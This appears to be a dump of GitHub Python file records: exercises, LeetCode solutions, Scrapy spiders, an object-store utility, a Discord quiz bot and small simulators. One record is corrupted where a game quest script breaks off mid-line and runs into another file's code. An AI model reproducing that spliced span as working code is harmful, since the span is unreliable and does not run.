return total\r\n#\r\n# print(sum((8, 2, 3, 0, 7)))\r\n#\r\n# # #3.Write a Python function that takes a list and returns a new list with unique elements of the first list.\r\n# def list1(l):\r\n# num = []\r\n# for a in l:\r\n# if a not in num:\r\n# num.append(a)\r\n# return num\r\n# print('unique elements are')\r\n# print(list1([1,2,4,5,4,5,6,9,10]))\r\n# #\r\n# # #4.Write a Python function that takes a number as a parameter and check the number is prime or not.\r\n# # def prime(a):\r\n# # for i in range (2,a) :\r\n# # if a % i == 0 :\r\n# # print(\"number is prime\")\r\n# # else:\r\n# # print(\"number is not prime\")\r\n# # a = int(input(\"Enter a number : \"))\r\n# # prime(a)\r\n# #\r\n# #\r\n# #\r\n# # #5.Write a Python function that checks whether a passed string is palindrome or not.\r\n# # def pal(a):\r\n# #\r\n# # if (a == a[::-1]):\r\n# print(\"The string is a palindrome\")\r\n# else:\r\n# print(\"The string is not a palindrome\")\r\n#\r\n# a = input(\"Enter string:\")\r\n# pal(a)","repo_name":"anirbang324/Python-Basics-to-Advance-","sub_path":"function_1.py","file_name":"function_1.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36417775460","text":"# Made by Mr. - Version 0.3 by DrLecter\nimport sys\nfrom com.it.br.gameserver.model.quest import State\nfrom com.it.br.gameserver.model.quest import QuestState\nfrom com.it.br.gameserver.model.quest.jython import QuestJython as JQuest\n\nqn = \"326_VanquishRemnants\"\n\nRED_CROSS_BADGE,BLUE_CROSS_BADGE,BLACK_CROSS_BADGE, = range(1359,1362)\nADENA = 57\nBLACK_LION_MARK = 1369\n\nDROPLIST={\n20053:[RED_CROSS_BADGE,25],\n20437:[RED_CROSS_BADGE,25],\n20058:[RED_CROSS_BADGE,25],\n20061:[BLUE_CROSS_BADGE,25],\n20063:[BLUE_CROSS_BADGE,25],\n20436:[BLUE_CROSS_BADGE,25],\n20439:[BLUE_CROSS_BADGE,25],\n20438:[BLACK_CROSS_BADGE,35],\n20066:[BLACK_CROSS_BADGE,25],\n}\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)\n\n def onEvent (self,event,st) :\n htmltext = event\n if event == \"30435-03.htm\" :\n st.set(\"cond\",\"1\")\n st.setState(STARTED)\n st.playSound(\"ItemSound.quest_accept\")\n elif event == \"30435-07.htm\" :\n st.playSound(\"ItemSound.quest_finish\")\n st.exitQuest(1)\n return htmltext\n\n def onTalk (self,npc,player):\n htmltext = \"You are either not carrying out your quest or don't meet the criteria.\"\n st = player.getQuestState(qn)\n if not st : return htmltext\n\n npcId = npc.getNpcId()\n id = st.getState()\n if id == CREATED :\n st.set(\"cond\",\"0\")\n if st.getInt(\"cond\")==0 :\n if player.getLevel() >= 21 :\n htmltext = \"30435-02.htm\"\n else:\n htmltext = \"30435-01.htm\"\n st.exitQuest(1)\n else :\n red=st.getQuestItemsCount(RED_CROSS_BADGE)\n blue=st.getQuestItemsCount(BLUE_CROSS_BADGE)\n black=st.getQuestItemsCount(BLACK_CROSS_BADGE)\n if red+blue+black == 0 :\n htmltext = \"30435-04.htm\"\n else :\n htmltext = \"30435-05.htm\"\n st.giveItems(ADENA,60*red+65*blue+70*black)\n st.takeItems(RED_CROSS_BADGE,-1)\n st.takeItems(BLUE_CROSS_BADGE,-1)\n st.takeItems(BLACK_CROSS_BADGE,-1)\n if red+blue+black >= 100 :\n htmltext = \"30435-09.htm\"\n if st.getQuestItemsCount(BLACK_LION_MARK) == 0 :\n st.giveItems(BLACK_LION_MARK,1)\n htmltext = \"30435-06.htm\"\n return htmltext\n\n def onKill(self,npc,player,isPet):\n st = player.getQuestState(qn)\n if not st : return \n if st.getState() != STARTED : return \n \n item,chance=DROPLIST[npc.getNpcId()]\n if st.getRandom(100)= end:\n if n2_nums[start] + n2_nums[end] == finalTarget:\n aList = []\n aList.append(n1)\n aList.append(n2)\n aList.append(n2_nums[start])\n aList.append(n2_nums[end])\n if aList not in answerList:\n answerList.append(aList)\n start += 1\n elif n2_nums[start] + n2_nums[end] < finalTarget:\n start += 1\n else:\n end -= 1\n return answerList\n\nsum = Solution()\n'''\nanswer = sum.fourSum([5,5,3,5,1,-5,1,-2], 4)\nprint(answer)\n'''\nanswer = sum.fourSum([0,4,-5,2,-2,4,2,-1,4], 12)\nprint(answer)\n\n","repo_name":"jerrt2003/leetcode-in-python","sub_path":"18_4Sum/Q18_4sum.py","file_name":"Q18_4sum.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18157708413","text":"from scrapy.crawler import CrawlerProcess\r\nimport scrapy\r\n\r\nclass Spider(scrapy.Spider):\r\n name = 'dolar'\r\n start_urls = [\r\n 'https://dolarhoy.com/'\r\n ]\r\n custom_settings = {\r\n 'FEED_URI': 'dolar_hoy.csv',\r\n 'FEED_FORMAT': 'csv',\r\n 'FEED_EXPORT_ENCODING': 'utf-8'\r\n \r\n }\r\n\r\n def parse(self,response):\r\n links = response.xpath(\"//div[@class='tile is-parent is-7 is-vertical']//a/@href\").getall()\r\n\r\n for link in links:\r\n yield response.follow(link, callback=self.parse_link, cb_kwargs={'url': response.urljoin(link)})\r\n\r\n def parse_link(self, response, **kwargs):\r\n link = kwargs['url']\r\n \r\n nombre = response.xpath('//div[@class=\"tile is-child title\"]/text()').get()\r\n compra = response.xpath('//*[@id=\"sitio\"]/section/div/div[2]/div[2]/div[1]/div[2]/div[1]/div[2]/text()').get() \r\n venta = response.xpath('//*[@id=\"sitio\"]/section/div/div[2]/div[2]/div[1]/div[2]/div[2]/div[2]/text()').get() \r\n fecha = response.xpath('//div[@class=\"tile is-child\"]/span/text()').get()\r\n \r\n yield {\r\n 'title': nombre, \r\n 'Compra':compra, \r\n 'Venta':venta, \r\n 'Fecha':fecha,\r\n 'url': link\r\n }\r\n\r\nprocess = CrawlerProcess()\r\nprocess.crawl(Spider)\r\nprocess.start()\r\n ","repo_name":"JuaniBarra19/Challenge","sub_path":"Challenge 2.py","file_name":"Challenge 2.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72638624808","text":"import dataclasses\nimport os\nimport sys\nimport tempfile\nimport textwrap\nimport uuid\nfrom typing import Any, Dict, Iterator, Optional, Union\n\nimport yahp as hp\nfrom libcloud.storage.providers import get_driver\nfrom libcloud.storage.types import ObjectDoesNotExistError\n\n__all__ = [\"ObjectStoreHparams\", \"ObjectStore\"]\n\n\n@dataclasses.dataclass\nclass ObjectStoreHparams(hp.Hparams):\n \"\"\":class:`~composer.utils.object_store.ObjectStore` hyperparameters.\n\n .. rubric:: Example\n\n Here's an example on how to connect to an Amazon S3 bucket. This example assumes:\n\n * The container is named named ``MY_CONTAINER``.\n * The AWS Access Key ID is stored in an environment variable named ``AWS_ACCESS_KEY_ID``.\n * The Secret Access Key is in an environmental variable named ``AWS_SECRET_ACCESS_KEY``.\n\n .. testsetup:: composer.utils.object_store.ObjectStoreHparams.__init__.s3\n\n import os\n\n os.environ[\"AWS_ACCESS_KEY_ID\"] = \"key\"\n os.environ[\"AWS_SECRET_ACCESS_KEY\"] = \"secret\"\n\n .. doctest:: composer.utils.object_store.ObjectStoreHparams.__init__.s3\n\n >>> from composer.utils import ObjectStoreHparams\n >>> provider_hparams = ObjectStoreHparams(\n ... provider=\"s3\",\n ... container=\"MY_CONTAINER\",\n ... key_environ=\"AWS_ACCESS_KEY_ID\",\n ... secret_environ=\"AWS_SECRET_ACCESS_KEY\",\n ... )\n >>> provider = provider_hparams.initialize_object()\n >>> provider\n \n\n Args:\n provider (str): Cloud provider to use.\n\n See :class:`ObjectStore` for documentation.\n container (str): The name of the container (i.e. bucket) to use.\n key_environ (str, optional): The name of an environment variable containing the API key or username\n to use to connect to the provider. If no key is required, then set this field to ``None``.\n (default: ``None``)\n\n For security reasons, composer requires that the key be specified via an environment variable.\n For example, if your key is an environment variable called ``OBJECT_STORE_KEY`` that is set to ``MY_KEY``,\n then you should set this parameter equal to ``OBJECT_STORE_KEY``. Composer will read the key like this:\n\n .. testsetup:: composer.utils.object_store.ObjectStoreHparams.__init__.key\n\n import os\n import functools\n from composer.utils import ObjectStoreHparams\n\n os.environ[\"OBJECT_STORE_KEY\"] = \"MY_KEY\"\n ObjectStoreHparams = functools.partial(ObjectStoreHparams, provider=\"s3\", container=\"container\")\n\n .. doctest:: composer.utils.object_store.ObjectStoreHparams.__init__.key\n\n >>> import os\n >>> params = ObjectStoreHparams(key_environ=\"OBJECT_STORE_KEY\")\n >>> key = os.environ[params.key_environ]\n >>> key\n 'MY_KEY'\n\n secret_environ (str, optional): The name of an environment variable containing the API secret or password\n to use for the provider. If no secret is required, then set this field to ``None``. (default: ``None``)\n\n For security reasons, composer requires that the secret be specified via an environment variable.\n For example, if your secret is an environment variable called ``OBJECT_STORE_SECRET`` that is set to ``MY_SECRET``,\n then you should set this parameter equal to ``OBJECT_STORE_SECRET``. Composer will read the secret like this:\n\n .. testsetup:: composer.utils.object_store.ObjectStoreHparams.__init__.secret\n\n import os\n import functools\n from composer.utils import ObjectStoreHparams\n\n original_secret = os.environ.get(\"OBJECT_STORE_SECRET\")\n os.environ[\"OBJECT_STORE_SECRET\"] = \"MY_SECRET\"\n ObjectStoreHparams = functools.partial(ObjectStoreHparams, provider=\"s3\", container=\"container\")\n\n\n .. doctest:: composer.utils.object_store.ObjectStoreHparams.__init__.secret\n\n >>> import os\n >>> params = ObjectStoreHparams(secret_environ=\"OBJECT_STORE_SECRET\")\n >>> secret = os.environ[params.secret_environ]\n >>> secret\n 'MY_SECRET'\n\n region (str, optional): Cloud region to use for the cloud provider.\n Most providers do not require the region to be specified. (default: ``None``)\n host (str, optional): Override the hostname for the cloud provider. (default: ``None``)\n port (int, optional): Override the port for the cloud provider. (default: ``None``)\n extra_init_kwargs (Dict[str, Any], optional): Extra keyword arguments to pass into the constructor\n for the specified provider. (default: ``None``, which is equivalent to an empty dictionary)\n\n .. seealso:: :class:`libcloud.storage.base.StorageDriver`\n\n \"\"\"\n\n provider: str = hp.required(\"Cloud provider to use.\")\n container: str = hp.required(\"The name of the container (i.e. bucket) to use.\")\n key_environ: Optional[str] = hp.optional(textwrap.dedent(\"\"\"\\\n The name of an environment variable containing\n an API key or username to use to connect to the provider.\"\"\"),\n default=None)\n secret_environ: Optional[str] = hp.optional(textwrap.dedent(\"\"\"\\\n The name of an environment variable containing\n an API secret or password to use to connect to the provider.\"\"\"),\n default=None)\n region: Optional[str] = hp.optional(\"Cloud region to use\", default=None)\n host: Optional[str] = hp.optional(\"Override hostname for connections\", default=None)\n port: Optional[int] = hp.optional(\"Override port for connections\", default=None)\n extra_init_kwargs: Dict[str, Any] = hp.optional(\n \"Extra keyword arguments to pass into the constructor for the specified provider.\", default_factory=dict)\n\n def get_provider_kwargs(self) -> Dict[str, Any]:\n \"\"\"Returns the ``provider_kwargs`` argument, which is used to construct a :class:`.ObjectStore`.\n\n Returns:\n Dict[str, Any]: The ``provider_kwargs`` for use in constructing an :class:`.ObjectStore`.\n \"\"\"\n init_kwargs = {}\n for key in (\"host\", \"port\", \"region\"):\n kwarg = getattr(self, key)\n if getattr(self, key) is not None:\n init_kwargs[key] = kwarg\n init_kwargs[\"key\"] = None if self.key_environ is None else os.environ[self.key_environ]\n init_kwargs[\"secret\"] = None if self.secret_environ is None else os.environ[self.secret_environ]\n init_kwargs.update(self.extra_init_kwargs)\n return init_kwargs\n\n def initialize_object(self):\n \"\"\"Returns an instance of :class:`.ObjectStore`.\n\n Returns:\n ObjectStore: The object_store.\n \"\"\"\n\n return ObjectStore(\n provider=self.provider,\n container=self.container,\n provider_kwargs=self.get_provider_kwargs(),\n )\n\n\nclass ObjectStore:\n \"\"\"Utility for uploading to and downloading from object (blob) stores, such as Amazon S3.\n\n .. rubric:: Example\n\n Here's an example for an Amazon S3 bucket named ``MY_CONTAINER``:\n\n >>> from composer.utils import ObjectStore\n >>> object_store = ObjectStore(\n ... provider=\"s3\",\n ... container=\"MY_CONTAINER\",\n ... provider_kwargs={\n ... \"key\": \"AKIA...\",\n ... \"secret\": \"*********\",\n ... }\n ... )\n >>> object_store\n \n\n Args:\n provider (str): Cloud provider to use. Valid options are:\n\n * :mod:`~libcloud.storage.drivers.atmos`\n * :mod:`~libcloud.storage.drivers.auroraobjects`\n * :mod:`~libcloud.storage.drivers.azure_blobs`\n * :mod:`~libcloud.storage.drivers.backblaze_b2`\n * :mod:`~libcloud.storage.drivers.cloudfiles`\n * :mod:`~libcloud.storage.drivers.digitalocean_spaces`\n * :mod:`~libcloud.storage.drivers.google_storage`\n * :mod:`~libcloud.storage.drivers.ktucloud`\n * :mod:`~libcloud.storage.drivers.local`\n * :mod:`~libcloud.storage.drivers.minio`\n * :mod:`~libcloud.storage.drivers.nimbus`\n * :mod:`~libcloud.storage.drivers.ninefold`\n * :mod:`~libcloud.storage.drivers.oss`\n * :mod:`~libcloud.storage.drivers.rgw`\n * :mod:`~libcloud.storage.drivers.s3`\n\n .. seealso:: :doc:`Full list of libcloud providers `\n\n container (str): The name of the container (i.e. bucket) to use.\n provider_kwargs (Dict[str, Any], optional): Keyword arguments to pass into the constructor\n for the specified provider. These arguments would usually include the cloud region\n and credentials.\n\n Common keys are:\n\n * ``key`` (str): API key or username to be used (required).\n * ``secret`` (str): Secret password to be used (required).\n * ``secure`` (bool): Whether to use HTTPS or HTTP. Note: Some providers only support HTTPS, and it is on by default.\n * ``host`` (str): Override hostname used for connections.\n * ``port`` (int): Override port used for connections.\n * ``api_version`` (str): Optional API version. Only used by drivers which support multiple API versions.\n * ``region`` (str): Optional driver region. Only used by drivers which support multiple regions.\n\n .. seealso:: :class:`libcloud.storage.base.StorageDriver`\n \"\"\"\n\n def __init__(self, provider: str, container: str, provider_kwargs: Optional[Dict[str, Any]] = None) -> None:\n provider_cls = get_driver(provider)\n if provider_kwargs is None:\n provider_kwargs = {}\n self._provider = provider_cls(**provider_kwargs)\n self._container = self._provider.get_container(container)\n\n @property\n def provider_name(self):\n \"\"\"The name of the cloud provider.\"\"\"\n return self._provider.name\n\n @property\n def container_name(self):\n \"\"\"The name of the object storage container.\"\"\"\n return self._container.name\n\n def upload_object(self,\n file_path: str,\n object_name: str,\n verify_hash: bool = True,\n extra: Optional[Dict] = None,\n headers: Optional[Dict[str, str]] = None):\n \"\"\"Upload an object currently located on a disk.\n\n .. seealso:: :meth:`libcloud.storage.base.StorageDriver.upload_object`.\n\n Args:\n file_path (str): Path to the object on disk.\n object_name (str): Object name (i.e. where the object will be stored in the container.)\n verify_hash (bool, optional): Whether to verify hashes (default: ``True``)\n extra (Optional[Dict], optional): Extra attributes to pass to the underlying provider driver.\n (default: ``None``, which is equivalent to an empty dictionary)\n headers (Optional[Dict[str, str]], optional): Additional request headers, such as CORS headers.\n (defaults: ``None``, which is equivalent to an empty dictionary)\n \"\"\"\n self._provider.upload_object(file_path=file_path,\n container=self._container,\n object_name=object_name,\n extra=extra,\n verify_hash=verify_hash,\n headers=headers)\n\n def upload_object_via_stream(self,\n obj: Union[bytes, Iterator[bytes]],\n object_name: str,\n extra: Optional[Dict] = None,\n headers: Optional[Dict[str, str]] = None):\n \"\"\"Upload an object.\n\n .. seealso:: :meth:`libcloud.storage.base.StorageDriver.upload_object_via_stream`.\n\n Args:\n obj (bytes | Iterator[bytes]): The object.\n object_name (str): Object name (i.e. where the object will be stored in the container.)\n verify_hash (bool, optional): Whether to verify hashes (default: ``True``)\n extra (Optional[Dict], optional): Extra attributes to pass to the underlying provider driver.\n (default: ``None``)\n headers (Optional[Dict[str, str]], optional): Additional request headers, such as CORS headers.\n (defaults: ``None``)\n \"\"\"\n if isinstance(obj, bytes):\n obj = iter(i.to_bytes(1, sys.byteorder) for i in obj)\n self._provider.upload_object_via_stream(iterator=obj,\n container=self._container,\n object_name=object_name,\n extra=extra,\n headers=headers)\n\n def _get_object(self, object_name: str):\n \"\"\"Get object from object store. Recursively follow any symlinks. If an object does not exist, automatically\n checks if it is a symlink by appending ``.symlink``.\n\n Args:\n object_name (str): The name of the object.\n \"\"\"\n obj = None\n try:\n obj = self._provider.get_object(self._container.name, object_name)\n except ObjectDoesNotExistError:\n # Object not found, check for potential symlink\n object_name += \".symlink\"\n obj = self._provider.get_object(self._container.name, object_name)\n # Recursively trace any symlinks\n if obj.name.endswith(\".symlink\"):\n # Download symlink object to temporary folder\n with tempfile.TemporaryDirectory() as tmpdir:\n tmppath = os.path.join(tmpdir, str(uuid.uuid4()))\n self._provider.download_object(obj=obj,\n destination_path=tmppath,\n overwrite_existing=True,\n delete_on_failure=True)\n # Read object name in symlink and recurse\n with open(tmppath) as f:\n symlinked_object_name = f.read()\n return self._get_object(symlinked_object_name)\n return obj\n\n def get_object_size(self, object_name: str) -> int:\n \"\"\"Get the size of an object, in bytes.\n\n Args:\n object_name (str): The name of the object.\n\n Returns:\n int: The object size, in bytes.\n \"\"\"\n return self._get_object(object_name).size\n\n def download_object(self,\n object_name: str,\n destination_path: str,\n overwrite_existing: bool = False,\n delete_on_failure: bool = True):\n \"\"\"Download an object to the specified destination path.\n\n .. seealso:: :meth:`libcloud.storage.base.StorageDriver.download_object`.\n\n Args:\n object_name (str): The name of the object to download.\n\n destination_path (str): Full path to a file or a directory where the incoming file will be saved.\n\n overwrite_existing (bool, optional): Set to ``True`` to overwrite an existing file. (default: ``False``)\n delete_on_failure (bool, optional): Set to ``True`` to delete a partially downloaded file if\n the download was not successful (hash mismatch / file size). (default: ``True``)\n \"\"\"\n obj = self._get_object(object_name)\n self._provider.download_object(obj=obj,\n destination_path=destination_path,\n overwrite_existing=overwrite_existing,\n delete_on_failure=delete_on_failure)\n\n def download_object_as_stream(self, object_name: str, chunk_size: Optional[int] = None):\n \"\"\"Return a iterator which yields object data.\n\n .. seealso:: :meth:`libcloud.storage.base.StorageDriver.download_object_as_stream`.\n\n Args:\n object_name (str): Object name.\n chunk_size (Optional[int], optional): Optional chunk size (in bytes).\n\n Returns:\n Iterator[bytes]: The object, as a byte stream.\n \"\"\"\n obj = self._get_object(object_name)\n return self._provider.download_object_as_stream(obj, chunk_size=chunk_size)\n","repo_name":"BehradToghi/composer_benchmarker","sub_path":"composer/utils/object_store.py","file_name":"object_store.py","file_ext":"py","file_size_in_byte":16797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70949569127","text":"class Solution:\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n tempDict = dict()\n for i, element in enumerate(nums):\n if target - element in tempDict:\n return [tempDict[target - element], i]\n tempDict[element] = i","repo_name":"DF-Kyun/LeetCode_practice","sub_path":"Table/1. Two Sum/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39966407274","text":"\"\"\"\nMath problem generator for practice and competition.\nInspired by Art of Problem Solving's FTW, which was\ndeprecated when Adobe Flash was phased out after 2020.\n\"\"\"\n\nimport discord\nfrom discord.ext import commands\n\nimport os\n\nimport random\nimport time\nimport asyncio\nimport json\n\nimport problem_gen as pg\n\nRECORDS_PATH = 'C:/Users/jettw/Documents/Sophia Tutoring/speed_bot/user_records.json'\nANS_TOLERANCE = 0.0001\nDEFAULT_TIMER = 45\nDEFAULT_POINT_GOAL = 4\n# PROBLEMS = [f for _, f in problem_gen.__all__]\n\n# %%\n# question_generators = [*problem_type.problems() for problem_type in questions]\n\n\nTOKEN = os.getenv('DISCORD_TOKEN')\nPREFIX = \"&\"\n\nclient = commands.Bot(command_prefix = PREFIX)\n\n@client.event\nasync def on_ready():\n print('Bot ready!')\n\n__in_problem = False\n\n@client.command(name='ping')\nasync def ping(ctx):\n await ctx.send('pong!')\n\n@client.command(name='cd')\nasync def cd(ctx, *args):\n f\"\"\"\n Starts a countdown round where members race to solve problems.\n Format is first to x points, each question t seconds.\n Default: t={DEFAULT_TIMER}, x={DEFAULT_POINT_GOAL}.\n To customize, call {PREFIX}cd with both arguments specified.\n \"\"\"\n if len(args) == 2 and problem_gen.helpers.check_pos_int(args):\n t, x = args\n elif len(args) == 0:\n t, x = 45, 4\n else:\n await ctx.send(f'Improper arguments to {PREFIX}')\n\n\n\n\n@client.command(name='p')\nasync def problem(ctx):\n \"\"\"\n Serves a randomized problem.\n \"\"\"\n global __in_problem\n if __in_problem:\n await ctx.send('There\\'s already an active question!')\n return\n print('Generating problem...')\n\n question, answer = random.choice(question_generators)()\n await ctx.send(question)\n __in_problem = True\n start_time = time.time_ns()\n\n def check(m):\n try:\n return round(float(m.content), 3) == round(answer,3) and m.channel == ctx.channel\n except ValueError:\n return\n \n try:\n await client.wait_for('message', timeout=DEFAULT_TIMER, check=check)\n except asyncio.TimeoutError:\n await ctx.send(f'Time out! The answer is {round(answer,3)}.')\n time_spent = DEFAULT_TIMER\n else:\n await ctx.send(f'Correct! You spent {round(time_spent,3)} seconds.')\n time_spent = (time.time_ns() - start_time)/1e9\n author_id = f'{ctx.author.name}#{ctx.author.discriminator}'\n update(author_id,time_spent)\n __in_problem = False\n \n\n@client.command(name='stats')\nasync def stats(ctx):\n author_id = f'{ctx.author.name}#{ctx.author.discriminator}'\n with open(RECORDS_PATH, 'r', encoding='utf-8') as f:\n try:\n record = json.load(f)[author_id]\n except:\n record = None\n await ctx.send(f'Stats for {author_id}:'\n f'{record}')\n #TODO properly format the stats string\n\ndef update(user,time_spent):\n with open(RECORDS_PATH, 'r', encoding='utf-8') as f:\n all_records = json.load(f)\n if user not in all_records:\n last_10 = [-1000] * 9\n last_10.append(time_spent)\n all_records[user] = {'problems attempted': 1, 'avg time': time_spent, \n 'last 10 times': last_10}\n with open('user_records.json','w', encoding='utf-8') as f:\n json.dump(all_records, f, indent=2, ensure_ascii=False)\n return\n record = all_records[user]\n record['avg time'] = (record['avg time']*record['problems attempted'] + time_spent)/(record['problems attempted'] + 1)\n record['problems attempted'] += 1\n q = record['last 10 times']\n q.pop(0)\n q.append(time_spent)\n record['last 10 times'] = q\n with open(RECORDS_PATH,'w', encoding='utf-8') as f:\n json.dump(all_records, f, indent=2, ensure_ascii=False)\n# %%\nclient.run(TOKEN)\n","repo_name":"quadraticmuffin/discord-ftw","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26325239736","text":"import SPP_io\nimport SPP_exceptions\nimport SPP_init\nimport SPP_aux\nimport SPP_encounter\nimport SPP_assert\n\n# 4,2,10,10,200\n\ndef initnodes(algorithm):\n \"\"\" Initializes the nodes given an algorithm.\"\"\"\n return algorithm.execute(nodes,maxnodeval)\n\n\nclass Node:\n \"\"\"Class node defines an agent.\"\"\"\n def __init__(self):\n self.value = SPP_aux.selectRandomInt(maxnodeval)\n \n def setValue(self, val):\n self.value = val\n \nclass Experiment:\n def __init__(self,var_init,var_encounter,var_assert):\n for algo in SPP_init.algorithms:\n if (algo.__str__() == var_init):\n self._init = algo\n for algo in SPP_encounter.algorithms:\n if (algo.__str__() == var_encounter):\n self._encounter = algo \n for algo in SPP_assert.algorithms:\n if (algo.__str__() == var_assert):\n self._assert = algo\n def __str__(self):\n return \"[init: %s, encounter: %s, assert: %s]\" % (var_init, var_encounter, var_assert)\n# MAIN #\n\n\ndef experiment():\n \n global nodes \n global maxnodes\n global var_init\n global var_encounter\n global var_assert\n global runsPerExp\n global roundsPerRun\n global maxnodeval\n \n maxnodes= eval(maxnodes)\n runsPerExp = eval(runsPerExp)\n roundsPerRun = eval(roundsPerRun)\n maxnodeval = eval(maxnodeval)\n \n \n nodes = []\n for i in range(maxnodes):\n nodes += [Node()]\n \n experiment = Experiment(var_init, var_encounter, var_assert) \n print(\"STARTING %s experiment, for %d runs\\n\" % (Experiment, runsPerExp))\n \n for run in range(runsPerExp):\n maxInNetwork = initnodes(experiment._init)\n \n for round in range(roundsPerRun):\n node1 = SPP_aux.selectRandomNode(nodes)\n node2 = SPP_aux.selectRandomNode(nodes)\n experiment._encounter.execute(node1,node2)\n \n if (experiment._assert.execute(maxInNetwork,nodes)):\n print(\"\\n--Experiment %s, run %d, OK\" % (experiment, run))\n else:\n print(\"\\n--Experiment %s, run %d, FAILED\" % (experiment, run))\n SPP_io.dumpstates(nodes)\n \n print(\"DONE.\")\n \ndef main():\n global nodes \n global maxnodes\n global var_init\n global var_encounter\n global var_assert\n global runsPerExp\n global roundsPerRun\n global maxnodeval\n \n test = SPP_io.readvalues(\"specifications.txt\")\n for t in test:\n print(\"______________________TEST______________________\")\n maxnodes, var_init, var_encounter, var_assert, runsPerExp, roundsPerRun, maxnodeval = t\n print(\"NODES:\",maxnodes)\n experiment()\n \n \nif __name__ == \"__main__\":\n main() ","repo_name":"lidiamcfreitas/SimulatorPopulationProtocols","sub_path":"simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"23241195195","text":"# 0,1,···,n-1这n个数字排成一个圆圈,从数字0开始,每次从这个圆圈里删除第m个数字(删除后从下一个数字开始计数)。求出这个圆圈里剩下的最后一个数字。\n#\n# 例如,0、1、2、3、4这5个数字组成一个圆圈,从数字0开始每次删除第3个数字,则删除的前4个数字依次是2、0、4、1,因此最后剩下的数字是3。\n#\n\n\"\"\"\n# 模拟法,递归,超时\nclass Solution:\n def dfs(self, nums, m, start):\n if len(nums) == 1:\n return nums[0]\n delIdx = (start + m - 1) % len(nums)\n nums.pop(delIdx)\n return self.dfs(nums, m, delIdx)\n\n def lastRemaining(self, n: int, m: int) -> int:\n nums = list(range(n))\n return self.dfs(nums, m, 0)\n\"\"\"\n\n# 动态规划,著名的约瑟夫环\n# 若已知[n-1,m]问题的解为f(n-1),则[n,m]问题的解为\n# f(n)=(f(n-1)+m)%n\n\nclass Solution:\n def lastRemaining(self, n: int, m: int) -> int:\n x = 0\n for i in range(2, n + 1):\n x = (x + m) % i\n return x\n","repo_name":"vandeppce/algorithm","sub_path":"15.math/Offer62*LastRemaining.py","file_name":"Offer62*LastRemaining.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44561024158","text":"import math\nimport matplotlib.pyplot as plt\n\ng=9.8\n\ndef simple_euler(omega0,theta0,l,T,dt):\n t=0\n omega,theta = omega0,theta0\n motion=[[]for i in range(3)]\n motion[0].append(omega)\n motion[1].append(theta)\n motion[2].append(t)\n while t<=T:\n m = omega\n omega = m-(g/l)*theta*dt\n theta = theta+m*dt\n t = t+dt\n motion[0].append(omega)\n motion[1].append(theta)\n motion[2].append(t)\n return motion\n\nd=simple_euler(0,0.2,1,10,0.04)\nplt.plot(d[2],d[1],linestyle='-',linewidth=1.0,label='dt=0.04')\nd=simple_euler(0,0.2,1,10,0.05)\nplt.plot(d[2],d[1],linestyle='-',linewidth=1.0,label='dt=0.05')\n\n\nplt.xlim(0,10)\nplt.grid(True,color='k')\nplt.title('Fig.1 simple_euler')\nplt.xlabel('Time(s)')\nplt.ylabel(r'$\\theta$(radius)')\nplt.legend()\nplt.show()\n\n\n","repo_name":"zhaoyoyo/computationalphysics_N2013301020083","sub_path":"finalexam/euler.py","file_name":"euler.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16422566995","text":"import scrapy\nimport sys\nfrom tutorial.items import Book\n\n\nclass doubanSpider(scrapy.Spider):\n \n name = 'testEntry'\n\n start_urls = [\n 'https://book.douban.com/subject/25862578/'\n ]\n\n def parse_entry(self, response):\n\n # book = Book()\n\n ############################## info from entry ############################\n ###########################################################################\n \n # title = response.css('div#info span.pl::text').extract()\n # for i in title:\n # i.replace(':','').replace(':','')\n # content = response.css('div#info::text').extract()\n # for i in content:\n # i.strip().replace('\\n', '').replace\n \n ###########################################################################\n ###########################################################################\n \n\n # book['name'] = response.xpath('//*[@id=\"wrapper\"]/h1/span')\n # book['author'] = response.xpath('//*[@id=\"info\"]/a[1]/text()').extract()[0].strip().replace('\\n','').replace(' ','')\n # book['public'] = response.xpath('//*[@id=\"info\"]/text()[5]').extract()[0].replace(' ','')\n # book['origin_name'] = response.xpath('//*[@id=\"info\"]/text()[7]').extract()[0].replace(' ','')\n # book['public_year'] = response.xpath('//*[@id=\"info\"]/text()[10]').extract()[0].replace(' ','')\n # book['pages'] = response.xpath('//*[@id=\"info\"]/text()[12]').extract()[0].replace(' ','')\n # book['price'] = response.xpath('//*[@id=\"info\"]/text()[14]').extract()[0].replace(' ','')\n # book['book_type'] = response.xpath('//*[@id=\"info\"]/text()[16]').extract()[0].replace(' ','')\n # book['isbn'] = response.xpath('//*[@id=\"info\"]/text()[20]').extract()[0].replace(' ','')\n # book['comment_link'] = response.xpath('//*[@id=\"content\"]/div/div[1]/div[3]/div[11]/h2/span[2]/a/@href').extract[0]\n\n # yield book\n\n link = response.css('div.mod-hd h2 span.pl a::attr(href)').extract()[0]\n comment_link = response.urljoin(link)\n yield scrapy.Request(comment_link, callback=self.parse_comment)\n\n","repo_name":"SunnyZWQ/crawl-book","sub_path":"tutorial/spiders/testEntry.py","file_name":"testEntry.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 